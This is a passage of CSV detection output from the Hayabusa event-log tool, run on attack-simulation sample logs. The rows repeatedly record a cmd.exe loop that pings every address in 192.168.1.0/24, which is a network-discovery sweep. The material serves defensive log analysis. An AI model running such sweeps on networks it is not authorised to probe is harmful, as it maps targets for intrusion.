192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:16.584 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.84 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:17.041 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.85 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:17.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.86 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:18.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.87 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:18.509 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.88 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:18.990 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.89 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:19.541 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.90 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:20.006 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.91 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:20.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.92 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:21.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.93 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:21.488 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.94 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:22.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.95 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:22.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.96 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:23.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.97 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:23.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.98 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:24.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.99 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:24.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.100 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:25.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.101 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:25.529 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.102 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:26.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.103 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:26.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.104 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:27.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.105 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:27.493 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.106 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:28.017 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.107 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:28.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.108 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:29.110 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.109 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:29.561 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.110 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:30.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.111 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:30.526 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.112 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:31.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.113 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:31.476 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.114 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:32.005 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.115 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:32.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.116 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:33.004 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.117 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:33.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.118 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:33.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.119 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:34.490 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.120 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:35.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.121 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:35.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.122 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:35.999 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.123 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:36.510 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.124 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:36.905 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.125 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:37.449 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.126 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:37.947 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.127 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:38.514 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.128 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:38.992 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.129 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:39.508 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.130 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:40.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.131 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:40.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.132 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:40.960 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.133 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:41.512 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.134 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:41.967 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.135 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:42.436 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.136 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:42.881 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.137 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:43.478 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.138 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:43.951 +09:00,MSEDGEWIN10,1,informational,Process 